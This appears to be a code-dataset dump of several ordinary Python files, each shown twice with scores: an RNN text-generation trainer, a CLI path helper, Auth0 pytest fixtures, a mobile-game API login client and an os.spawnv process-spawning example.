probs = tf.nn.softmax(logits, name='probs')
# Loss function
cost = seq2seq.sequence_loss(
logits,
targets,
tf.ones([input_data_shape[0], input_data_shape[1]]))
# Optimizer
optimizer = tf.train.AdamOptimizer(lr)
# Gradient Clipping
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.apply_gradients(capped_gradients)
# In[24]:
#训练
batches = get_batches(int_text, batch_size, seq_length)
with tf.Session(graph=train_graph) as sess:
sess.run(tf.global_variables_initializer())
for epoch_i in range(num_epochs):
state = sess.run(initial_state, {input_text: batches[0][0]})
for batch_i, (x, y) in enumerate(batches):
feed = {
input_text: x,
targets: y,
initial_state: state,
lr: learning_rate}
train_loss, state, _ = sess.run([cost, final_state, train_op], feed)
# Show every <show_every_n_batches> batches
if (epoch_i * len(batches) + batch_i) % show_every_n_batches == 0:
print('Epoch {:>3} Batch {:>4}/{} train_loss = {:.3f}'.format(
epoch_i,
batch_i,
len(batches),
train_loss))
# Save Model
saver = tf.train.Saver()
saver.save(sess, save_dir)
print('Model Trained and Saved')
# In[25]:
#参数保留
helper.save_params((seq_length, save_dir))
# In[ ]: | generation_train_and_save.py |
# In[13]:
import helper
import numpy as np
from distutils.version import LooseVersion
import warnings
import tensorflow as tf
from tensorflow.contrib import seq2seq
# In[14]:
int_text, vocab_to_int, int_to_vocab, token_dict = helper.load_preprocess()
# 建立NN网络
# In[15]:
# Check TensorFlow Version
assert LooseVersion(tf.__version__) >= LooseVersion('1.0'), 'Please use TensorFlow version 1.0 or newer'
print('TensorFlow Version: {}'.format(tf.__version__))
# Check for a GPU
if not tf.test.gpu_device_name():
warnings.warn('No GPU found. Please use a GPU to train your neural network.')
else:
print('Default GPU Device: {}'.format(tf.test.gpu_device_name()))
# In[16]:
def get_inputs():
'''
输入初始化
'''
input_data = tf.placeholder(tf.int32,[None,None],name='input')
target_data = tf.placeholder(tf.int32,[None,None],name='target')
learning_rate = tf.placeholder(tf.float32,name='learning_rate')
return input_data, target_data, learning_rate
# In[17]:
def get_init_cell(batch_size, rnn_size):
"""
初始化 RNN Cell.
:param batch_size: Size of batches
:param rnn_size: Size of RNNs
:return: Tuple (cell, initialize state)
"""
lstm = tf.contrib.rnn.BasicLSTMCell(rnn_size)
cell = tf.contrib.rnn.MultiRNNCell([lstm]*2)
initial_state = tf.identity(cell.zero_state(batch_size, tf.float32),name='initial_state')
return cell, initial_state
# In[18]:
def get_embed(input_data, vocab_size, embed_dim):
"""
word embedding 输入.
:param input_data: 输入.
:param vocab_size: 总词语数.
:param embed_dim: w2v 维数
:return: Embedded input.
"""
#embedding 初始化,这边不采用预先训练的embeding,边训练边调参数
embedding = tf.Variable(tf.random_uniform((vocab_size,embed_dim),-1,1))
embed = tf.nn.embedding_lookup(embedding,input_data)
return embed
# In[19]:
def build_rnn(cell, inputs):
"""
:param cell: RNN Cell
:param inputs: Input text data
:return: Tuple (Outputs, Final State)
"""
Outputs,Finalstate = tf.nn.dynamic_rnn(cell,inputs,dtype=tf.float32)
Final_state = tf.identity(Finalstate,"final_state")
return Outputs,Final_state
# In[20]:
def build_nn(cell, rnn_size, input_data, vocab_size, embed_dim):
"""
:param cell: RNN cell
:param rnn_size: Size of rnns
:param input_data: Input data
:param vocab_size: Vocabulary size
:param embed_dim: Number of embedding dimensions
:return: Tuple (Logits, FinalState)
"""
embedding = get_embed(input_data,vocab_size,embed_dim)
lstm_output,final_state = build_rnn(cell,embedding)
#seq_output = tf.concat(lstm_output, axis=1)
#x = tf.reshape(seq_output,[-1,rnn_size])
#print(embedding.get_shape())
#print(lstm_output.get_shape())
#weights = tf.Variable(tf.truncated_normal([lstm_output.get_shape()[0].value,lstm_output.get_shape()[2].value,vocab_size], stddev=0.1))
#bias = tf.Variable(tf.zeros(vocab_size))
#print(weights.get_shape())
#logits = tf.matmul(lstm_output,weights)+ bias
logits = tf.contrib.layers.fully_connected(lstm_output,vocab_size,activation_fn=None)
return logits,final_state
# In[21]:
def get_batches(int_text, batch_size, seq_length):
"""
Return batches of input and target
:param int_text: Text with the words replaced by their ids
:param batch_size: The size of batch
:param seq_length: The length of sequence
:return: Batches as a Numpy array
"""
batch_output = []
characters_per_batch = seq_length*batch_size
#print(characters_per_batch)
batch_num = len(int_text)//characters_per_batch
x_full_seqs = np.array(int_text[:batch_num*characters_per_batch])
y_full_seqs = np.zeros_like(x_full_seqs)
#bound limit
if len(int_text) > batch_num*characters_per_batch:
y_full_seqs = int_text[1:batch_num*characters_per_batch + 1]
else:
y_full_seqs[:-1],y_full_seqs[-1] = int_text[1:batch_num*characters_per_batch],int_text[0]
#reshape
x_reshape = np.reshape(x_full_seqs,(batch_size,-1))
y_reshape = np.reshape(y_full_seqs,(batch_size,-1))
# print(x_reshape)
# print(batch_num)
#individual batches
x_bathes = np.split(x_reshape,batch_num,1)
y_bathes = np.split(y_reshape,batch_num,1)
# print(x_bathes[0])
# print(y_bathes[0])
for i in range(batch_num):
batch_output.append(np.stack((x_bathes[i],y_bathes[i])))
return np.array(batch_output)
# In[22]:
#设置各种超参数
num_epochs = 30
batch_size = 256
rnn_size = 512
embed_dim = 400
seq_length = 20
learning_rate = 0.002
#打印间隔
show_every_n_batches = 30
#保存路径
save_dir = './save'
# In[23]:
#build the graph
train_graph = tf.Graph()
with train_graph.as_default():
vocab_size = len(int_to_vocab)
input_text, targets, lr = get_inputs()
input_data_shape = tf.shape(input_text)
cell, initial_state = get_init_cell(input_data_shape[0], rnn_size)
logits, final_state = build_nn(cell, rnn_size, input_text, vocab_size, embed_dim)
# Probabilities for generating words
probs = tf.nn.softmax(logits, name='probs')
# Loss function
cost = seq2seq.sequence_loss(
logits,
targets,
tf.ones([input_data_shape[0], input_data_shape[1]]))
# Optimizer
optimizer = tf.train.AdamOptimizer(lr)
# Gradient Clipping
gradients = optimizer.compute_gradients(cost)
capped_gradients = [(tf.clip_by_value(grad, -1., 1.), var) for grad, var in gradients if grad is not None]
train_op = optimizer.apply_gradients(capped_gradients)
# In[24]:
#训练
batches = get_batches(int_text, batch_size, seq_length)
with tf.Session(graph=train_graph) as sess:
sess.run(tf.global_variables_initializer())
for epoch_i in range(num_epochs):
state = sess.run(initial_state, {input_text: batches[0][0]})
for batch_i, (x, y) in enumerate(batches):
feed = {
input_text: x,
targets: y,
initial_state: state,
lr: learning_rate}
train_loss, state, _ = sess.run([cost, final_state, train_op], feed)
# Show every <show_every_n_batches> batches
if (epoch_i * len(batches) + batch_i) % show_every_n_batches == 0:
print('Epoch {:>3} Batch {:>4}/{} train_loss = {:.3f}'.format(
epoch_i,
batch_i,
len(batches),
train_loss))
# Save Model
saver = tf.train.Saver()
saver.save(sess, save_dir)
print('Model Trained and Saved')
# In[25]:
#参数保留
helper.save_params((seq_length, save_dir))
# In[ ]: | 0.571169 | 0.442757 |
from os import path
from bes.common.check import check
from bes.common.object_util import object_util
from bes.fs.file_check import file_check
from bes.fs.file_find import file_find
from bes.git.git import git
class cli_helper(object):
'A class to help implement cli tools'
@classmethod
def resolve_files(clazz, what, func = None):
'''
Return a list of absolute filenames for what.
'what' can be one or more of:
- a file
- a directory to search for files
'''
check.check_function(func, allow_none = True)
if not what:
return []
what = object_util.listify(what)
result = []
for x in what:
result.extend(clazz._resolve_one(x))
result = sorted(list(set(result)))
if func:
result = [ f for f in result if func(f) ]
return result
@classmethod
def _resolve_one(clazz, filename):
filename = path.abspath(filename)
if path.isfile(filename):
return [ filename ]
elif path.isdir(filename):
return file_find.find(filename, relative = False, file_type = file_find.FILE)
if path.exists(filename):
raise RuntimeError('File not a file or dir: {}'.format(filename))
raise RuntimeError('File not found: {}'.format(filename))
@classmethod
def check_file(clazz, filename):
file_check.check_file(filename)
@classmethod
def check_dir(clazz, dirname):
file_check.check_dir(dirname)
@classmethod
def check_dir_is_git_repo(clazz, d):
git.check_is_repo(d)
@classmethod
def resolve_file(clazz, filename, root_dir = None):
'''
Resolve a filename as follows:
. expand ~ to $HOME
. make it an absolute path
'''
if root_dir:
filename = path.join(root_dir, filename)
else:
if '~' in filename:
filename = path.expanduser(filename)
if not path.isabs(filename):
filename = path.abspath(filename)
return filename
@classmethod
def resolve_dir(clazz, dirname, root_dir = None):
return clazz.resolve_file(dirname, root_dir = root_dir)
@classmethod
def filter_keywords_args(clazz, clazz_for_instance, kargs):
check.check_class(clazz)
instance = clazz_for_instance()
fields = [ field for field in dir(instance) if not field.startswith('_') ]
copied_args = copy.deepcopy(kargs)
for field in fields:
if field in copied_args:
del copied_args[field]
return copied_args | lib/bes/cli/cli_helper.py |
from os import path
from bes.common.check import check
from bes.common.object_util import object_util
from bes.fs.file_check import file_check
from bes.fs.file_find import file_find
from bes.git.git import git
class cli_helper(object):
'A class to help implement cli tools'
@classmethod
def resolve_files(clazz, what, func = None):
'''
Return a list of absolute filenames for what.
'what' can be one or more of:
- a file
- a directory to search for files
'''
check.check_function(func, allow_none = True)
if not what:
return []
what = object_util.listify(what)
result = []
for x in what:
result.extend(clazz._resolve_one(x))
result = sorted(list(set(result)))
if func:
result = [ f for f in result if func(f) ]
return result
@classmethod
def _resolve_one(clazz, filename):
filename = path.abspath(filename)
if path.isfile(filename):
return [ filename ]
elif path.isdir(filename):
return file_find.find(filename, relative = False, file_type = file_find.FILE)
if path.exists(filename):
raise RuntimeError('File not a file or dir: {}'.format(filename))
raise RuntimeError('File not found: {}'.format(filename))
@classmethod
def check_file(clazz, filename):
file_check.check_file(filename)
@classmethod
def check_dir(clazz, dirname):
file_check.check_dir(dirname)
@classmethod
def check_dir_is_git_repo(clazz, d):
git.check_is_repo(d)
@classmethod
def resolve_file(clazz, filename, root_dir = None):
'''
Resolve a filename as follows:
. expand ~ to $HOME
. make it an absolute path
'''
if root_dir:
filename = path.join(root_dir, filename)
else:
if '~' in filename:
filename = path.expanduser(filename)
if not path.isabs(filename):
filename = path.abspath(filename)
return filename
@classmethod
def resolve_dir(clazz, dirname, root_dir = None):
return clazz.resolve_file(dirname, root_dir = root_dir)
@classmethod
def filter_keywords_args(clazz, clazz_for_instance, kargs):
check.check_class(clazz)
instance = clazz_for_instance()
fields = [ field for field in dir(instance) if not field.startswith('_') ]
copied_args = copy.deepcopy(kargs)
for field in fields:
if field in copied_args:
del copied_args[field]
return copied_args | 0.479747 | 0.117648 |
import logging
import pytest
from test_app.models import Auth0User
from tests.utils.auth0 import (
create_auth0_users_and_confirm,
delete_all_auth0_users as delete_all_auth0_users_via_api,
delete_all_auth0_users_with_confirmation,
pause_and_confirm_total_auth0_users,
)
logger = logging.getLogger(__name__)
DELAY = 15
# TODO: Refactor/Remove these fixtures as I'm not using testing things the same way anymore.
@pytest.fixture(scope="class")
def one_auth0_user(request):
"""
Pytest fixture providing one Auth0 user for testing.
Create a new user in Auth0 and add it to the class of our requesting test case class at runtime.
This is a little different than most PyTest fixtures because are working around the fact that
we are using SeleniumTestCase for some tests, which as a subclass of TestCase cannot use normal
PyTest fixture based parametrization.
:param request:
:return:
"""
users = create_auth0_users_and_confirm(1)
request.cls.user = users[0]
@pytest.fixture(scope='function')
def delete_all_auth0_users():
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
yield
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
@pytest.fixture(scope='function')
def delete_all_django_users():
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
@pytest.fixture(scope='function')
def cleanup_django_and_auth0():
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
@pytest.fixture(scope='function')
def one_user():
number_of_users = 1
logger.info('Start of one_user() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of one_user() fixture.')
@pytest.fixture(scope='function')
def five_users():
number_of_users = 5
logger.info('Start of five_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of five_users() fixture.')
@pytest.fixture(scope='function')
def ten_users():
number_of_users = 10
logger.info('Start of ten_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of ten_users() fixture.')
@pytest.fixture(scope='function')
def with_33_auth0_users():
number_of_users = 33
logger.info('Start of ten_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of ten_users() fixture.')
@pytest.fixture(scope='function')
def with_100_auth0_users():
number_of_users = 100
logger.info('Start of ten_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of ten_users() fixture.') | tests/fixtures/auth0.py | import logging
import pytest
from test_app.models import Auth0User
from tests.utils.auth0 import (
create_auth0_users_and_confirm,
delete_all_auth0_users as delete_all_auth0_users_via_api,
delete_all_auth0_users_with_confirmation,
pause_and_confirm_total_auth0_users,
)
logger = logging.getLogger(__name__)
DELAY = 15
# TODO: Refactor/Remove these fixtures as I'm not using testing things the same way anymore.
@pytest.fixture(scope="class")
def one_auth0_user(request):
"""
Pytest fixture providing one Auth0 user for testing.
Create a new user in Auth0 and add it to the class of our requesting test case class at runtime.
This is a little different than most PyTest fixtures because are working around the fact that
we are using SeleniumTestCase for some tests, which as a subclass of TestCase cannot use normal
PyTest fixture based parametrization.
:param request:
:return:
"""
users = create_auth0_users_and_confirm(1)
request.cls.user = users[0]
@pytest.fixture(scope='function')
def delete_all_auth0_users():
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
yield
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
@pytest.fixture(scope='function')
def delete_all_django_users():
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
@pytest.fixture(scope='function')
def cleanup_django_and_auth0():
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_via_api()
@pytest.fixture(scope='function')
def one_user():
number_of_users = 1
logger.info('Start of one_user() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of one_user() fixture.')
@pytest.fixture(scope='function')
def five_users():
number_of_users = 5
logger.info('Start of five_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of five_users() fixture.')
@pytest.fixture(scope='function')
def ten_users():
number_of_users = 10
logger.info('Start of ten_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of ten_users() fixture.')
@pytest.fixture(scope='function')
def with_33_auth0_users():
number_of_users = 33
logger.info('Start of ten_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of ten_users() fixture.')
@pytest.fixture(scope='function')
def with_100_auth0_users():
number_of_users = 100
logger.info('Start of ten_users() fixture.')
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
create_auth0_users_and_confirm(number_of_users)
pause_and_confirm_total_auth0_users(DELAY, number_of_users)
yield
logger.info('Deleting Django User objects.')
Auth0User.objects.all().delete()
logger.info('Deleting all auth0 users.')
delete_all_auth0_users_with_confirmation()
logger.info('End of ten_users() fixture.') | 0.235724 | 0.263629 |
import uuid
import hashlib
import base64
from urllib.parse import quote_plus
import fgourl
import mytime
class ParameterBuilder:
def __init__(self, uid: str, auth_key: str, secret_key: str):
self.uid_ = uid
self.auth_key_ = auth_key
self.secret_key_ = secret_key
self.content_ = ''
self.parameter_list_ = [
('appVer', fgourl.app_ver_),
('authKey', self.auth_key_),
('dataVer', str(fgourl.data_ver_)),
('dateVer', str(fgourl.date_ver_)),
('idempotencyKey', str(uuid.uuid4())),
('lastAccessTime', str(mytime.GetTimeStamp())),
('userId', self.uid_),
('verCode', fgourl.ver_code_),
]
def AddParameter(self, key: str, value: str):
self.parameter_list_.append((key, value))
def Build(self) -> str:
self.parameter_list_.sort(key=lambda tup: tup[0])
temp = ''
for first, second in self.parameter_list_:
if temp:
temp += '&'
self.content_ += '&'
escaped_key = quote_plus(first)
if not second:
temp += first + '='
self.content_ += escaped_key + '='
else:
escaped_value = quote_plus(second)
temp += first + '=' + second
self.content_ += escaped_key + '=' + escaped_value
temp += ':' + self.secret_key_
self.content_ += '&authCode=' + quote_plus(base64.b64encode(hashlib.sha1(temp.encode('utf-8')).digest()))
return self.content_
def Clean(self):
self.content_ = ''
self.parameter_list_ = [
('appVer', fgourl.app_ver_),
('authKey', self.auth_key_),
('dataVer', str(fgourl.data_ver_)),
('dateVer', str(fgourl.date_ver_)),
('idempotencyKey', str(uuid.uuid4())),
('lastAccessTime', str(mytime.GetTimeStamp())),
('userId', self.uid_),
('verCode', fgourl.ver_code_),
]
class user:
def __init__(self, user_id: str, auth_key: str, secret_key: str):
self.name_ = ''
self.user_id_ = (int)(user_id)
self.s_ = fgourl.NewSession()
self.builder_ = ParameterBuilder(user_id, auth_key, secret_key)
def Post(self, url):
res = fgourl.PostReq(self.s_, url, self.builder_.Build())
self.builder_.Clean()
return res
def topLogin(self):
lastAccessTime = self.builder_.parameter_list_[5][1]
userState = (-int(lastAccessTime) >> 2) ^ self.user_id_ & fgourl.data_server_folder_crc_
self.builder_.AddParameter('assetbundleFolder', fgourl.asset_bundle_folder_)
self.builder_.AddParameter('isTerminalLogin', '1')
self.builder_.AddParameter('userState', str(userState))
data = self.Post(f'{fgourl.server_addr_}/login/top?_userId={self.user_id_}')
self.name_ = hashlib.md5(data['cache']['replaced']['userGame'][0]['name'].encode('utf-8')).hexdigest()
stone = data['cache']['replaced']['userGame'][0]['stone']
lv = data['cache']['replaced']['userGame'][0]['lv']
ticket = 0
# 呼符
for item in data['cache']['replaced']['userItem']:
if item['itemId'] == 4001:
ticket = item['num']
break
# 登陆天数
login_days = data['cache']['updated']['userLogin'][0]['seqLoginCount']
total_days = data['cache']['updated']['userLogin'][0]['totalLoginCount']
res = f'*{self.name_}*\n`登陆天数: {login_days}天 / {total_days}天\n'
# 角色信息
res += f'等级: {lv}\n石头: {stone}\n呼符: {ticket}\n'
# 现有体力
act_max = data['cache']['replaced']['userGame'][0]['actMax']
act_recover_at = data['cache']['replaced']['userGame'][0]['actRecoverAt']
now_act = (act_max - (act_recover_at - mytime.GetTimeStamp()) / 300)
res += f'体力: {now_act} / {act_max}\n'
# 友情点
add_fp = data['response'][0]['success']['addFriendPoint']
total_fp = data['cache']['replaced']['tblUserGame'][0]['friendPoint']
res += f'友情点: {add_fp} / {total_fp}`\n'
# 登陆奖励
if 'seqLoginBonus' in data['response'][0]['success']:
bonus_message = data['response'][0]['success']['seqLoginBonus'][0]['message']
res += f'*{bonus_message}*\n`'
for i in data['response'][0]['success']['seqLoginBonus'][0]['items']:
res += f'{i["name"]} X {i["num"]}\n'
if 'campaignbonus' in data['response'][0]['success']:
bonus_name = data['response'][0]['success']['campaignbonus'][0]['name']
bonus_detail = data['response'][0]['success']['campaignbonus'][0]['detail']
res += f'`*{bonus_name}*\n*{bonus_detail}*\n`'
for i in data['response'][0]['success']['campaignbonus'][0]['items']:
res += f'{i["name"]} X {i["num"]}\n'
res += '`'
server_now_time = mytime.TimeStampToString(data['cache']['serverTime'])
res += f'_{server_now_time}_\n--------\n'
print(res)
return res
def topHome(self):
self.Post(f'{fgourl.server_addr_}/home/top?_userId={self.user_id_}') | user.py | import uuid
import hashlib
import base64
from urllib.parse import quote_plus
import fgourl
import mytime
class ParameterBuilder:
def __init__(self, uid: str, auth_key: str, secret_key: str):
self.uid_ = uid
self.auth_key_ = auth_key
self.secret_key_ = secret_key
self.content_ = ''
self.parameter_list_ = [
('appVer', fgourl.app_ver_),
('authKey', self.auth_key_),
('dataVer', str(fgourl.data_ver_)),
('dateVer', str(fgourl.date_ver_)),
('idempotencyKey', str(uuid.uuid4())),
('lastAccessTime', str(mytime.GetTimeStamp())),
('userId', self.uid_),
('verCode', fgourl.ver_code_),
]
def AddParameter(self, key: str, value: str):
self.parameter_list_.append((key, value))
def Build(self) -> str:
self.parameter_list_.sort(key=lambda tup: tup[0])
temp = ''
for first, second in self.parameter_list_:
if temp:
temp += '&'
self.content_ += '&'
escaped_key = quote_plus(first)
if not second:
temp += first + '='
self.content_ += escaped_key + '='
else:
escaped_value = quote_plus(second)
temp += first + '=' + second
self.content_ += escaped_key + '=' + escaped_value
temp += ':' + self.secret_key_
self.content_ += '&authCode=' + quote_plus(base64.b64encode(hashlib.sha1(temp.encode('utf-8')).digest()))
return self.content_
def Clean(self):
self.content_ = ''
self.parameter_list_ = [
('appVer', fgourl.app_ver_),
('authKey', self.auth_key_),
('dataVer', str(fgourl.data_ver_)),
('dateVer', str(fgourl.date_ver_)),
('idempotencyKey', str(uuid.uuid4())),
('lastAccessTime', str(mytime.GetTimeStamp())),
('userId', self.uid_),
('verCode', fgourl.ver_code_),
]
class user:
def __init__(self, user_id: str, auth_key: str, secret_key: str):
self.name_ = ''
self.user_id_ = (int)(user_id)
self.s_ = fgourl.NewSession()
self.builder_ = ParameterBuilder(user_id, auth_key, secret_key)
def Post(self, url):
res = fgourl.PostReq(self.s_, url, self.builder_.Build())
self.builder_.Clean()
return res
def topLogin(self):
lastAccessTime = self.builder_.parameter_list_[5][1]
userState = (-int(lastAccessTime) >> 2) ^ self.user_id_ & fgourl.data_server_folder_crc_
self.builder_.AddParameter('assetbundleFolder', fgourl.asset_bundle_folder_)
self.builder_.AddParameter('isTerminalLogin', '1')
self.builder_.AddParameter('userState', str(userState))
data = self.Post(f'{fgourl.server_addr_}/login/top?_userId={self.user_id_}')
self.name_ = hashlib.md5(data['cache']['replaced']['userGame'][0]['name'].encode('utf-8')).hexdigest()
stone = data['cache']['replaced']['userGame'][0]['stone']
lv = data['cache']['replaced']['userGame'][0]['lv']
ticket = 0
# 呼符
for item in data['cache']['replaced']['userItem']:
if item['itemId'] == 4001:
ticket = item['num']
break
# 登陆天数
login_days = data['cache']['updated']['userLogin'][0]['seqLoginCount']
total_days = data['cache']['updated']['userLogin'][0]['totalLoginCount']
res = f'*{self.name_}*\n`登陆天数: {login_days}天 / {total_days}天\n'
# 角色信息
res += f'等级: {lv}\n石头: {stone}\n呼符: {ticket}\n'
# 现有体力
act_max = data['cache']['replaced']['userGame'][0]['actMax']
act_recover_at = data['cache']['replaced']['userGame'][0]['actRecoverAt']
now_act = (act_max - (act_recover_at - mytime.GetTimeStamp()) / 300)
res += f'体力: {now_act} / {act_max}\n'
# 友情点
add_fp = data['response'][0]['success']['addFriendPoint']
total_fp = data['cache']['replaced']['tblUserGame'][0]['friendPoint']
res += f'友情点: {add_fp} / {total_fp}`\n'
# 登陆奖励
if 'seqLoginBonus' in data['response'][0]['success']:
bonus_message = data['response'][0]['success']['seqLoginBonus'][0]['message']
res += f'*{bonus_message}*\n`'
for i in data['response'][0]['success']['seqLoginBonus'][0]['items']:
res += f'{i["name"]} X {i["num"]}\n'
if 'campaignbonus' in data['response'][0]['success']:
bonus_name = data['response'][0]['success']['campaignbonus'][0]['name']
bonus_detail = data['response'][0]['success']['campaignbonus'][0]['detail']
res += f'`*{bonus_name}*\n*{bonus_detail}*\n`'
for i in data['response'][0]['success']['campaignbonus'][0]['items']:
res += f'{i["name"]} X {i["num"]}\n'
res += '`'
server_now_time = mytime.TimeStampToString(data['cache']['serverTime'])
res += f'_{server_now_time}_\n--------\n'
print(res)
return res
def topHome(self):
self.Post(f'{fgourl.server_addr_}/home/top?_userId={self.user_id_}') | 0.26569 | 0.107601 |
import os, sys
for i in range(10):
if sys.platform[:3] == 'win':
pypath = sys.executable
os.spawnv(os.P_NOWAIT, pypath, ('python', 'child.py', str(i)))
else:
pid = os.fork()
if pid != 0:
print('Process %d spawned' % pid)
else:
os.execlp('python', 'python', 'child.py', str(i))
print('Main process exiting.')
"""
In this script, we call os.spawnv with a process mode flag, the full
directory path to the Python interpreter, and a tuple of strings representing the shell
command line with which to start a new program.
The path to the Python interpreter executable program running a script is available as
sys.executable. In general, the process mode flag is taken from these predefined values:
os.P_NOWAIT and os.P_NOWAITO
The spawn functions will return as soon as the new process has been created, with
the process ID as the return value. Available on Unix and Windows.
os.P_WAIT
The spawn functions will not return until the new process has run to completion
and will return the exit code of the process if the run is successful or “-signal” if a
signal kills the process. Available on Unix and Windows.
os.P_DETACH and os.P_OVERLAY
P_DETACH is similar to P_NOWAIT, but the new process is detached from the console
of the calling process. If P_OVERLAY is used, the current program will be replaced
(much like os.exec). Available on Windows.
In fact, there are eight different calls in the spawn family, which all start a program but
vary slightly in their call signatures. In their names, an “l” means you list arguments
individually, “p” means the executable file is looked up on the system path, and “e”
means a dictionary is passed in to provide the shelled environment of the spawned
program: the os.spawnve call, for example, works the same way as os.spawnv but accepts
an extra fourth dictionary argument to specify a different shell environment for the
spawned program.
All the process mode flags are supported on Windows, but detach and
overlay modes are not available on Unix. Because this sort of detail may be prone to
change, to verify which are present, be sure to see the library manual or run a dir builtin
function call on the os module after an import.
""" | chapter_5/spawnv.py | import os, sys
for i in range(10):
if sys.platform[:3] == 'win':
pypath = sys.executable
os.spawnv(os.P_NOWAIT, pypath, ('python', 'child.py', str(i)))
else:
pid = os.fork()
if pid != 0:
print('Process %d spawned' % pid)
else:
os.execlp('python', 'python', 'child.py', str(i))
print('Main process exiting.')
"""
In this script, we call os.spawnv with a process mode flag, the full
directory path to the Python interpreter, and a tuple of strings representing the shell
command line with which to start a new program.
The path to the Python interpreter executable program running a script is available as
sys.executable. In general, the process mode flag is taken from these predefined values:
os.P_NOWAIT and os.P_NOWAITO
The spawn functions will return as soon as the new process has been created, with
the process ID as the return value. Available on Unix and Windows.
os.P_WAIT
The spawn functions will not return until the new process has run to completion
and will return the exit code of the process if the run is successful or “-signal” if a
signal kills the process. Available on Unix and Windows.
os.P_DETACH and os.P_OVERLAY
P_DETACH is similar to P_NOWAIT, but the new process is detached from the console
of the calling process. If P_OVERLAY is used, the current program will be replaced
(much like os.exec). Available on Windows.
In fact, there are eight different calls in the spawn family, which all start a program but
vary slightly in their call signatures. In their names, an “l” means you list arguments
individually, “p” means the executable file is looked up on the system path, and “e”
means a dictionary is passed in to provide the shelled environment of the spawned
program: the os.spawnve call, for example, works the same way as os.spawnv but accepts
an extra fourth dictionary argument to specify a different shell environment for the
spawned program.
All the process mode flags are supported on Windows, but detach and
overlay modes are not available on Unix. Because this sort of detail may be prone to
change, to verify which are present, be sure to see the library manual or run a dir builtin
function call on the os module after an import.
""" | 0.149438 | 0.308099 |
import torch
import numpy as np
